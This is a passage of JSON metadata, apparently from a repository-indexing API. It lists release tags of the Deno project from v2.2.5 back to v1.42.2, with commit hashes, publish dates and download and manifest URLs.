:"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"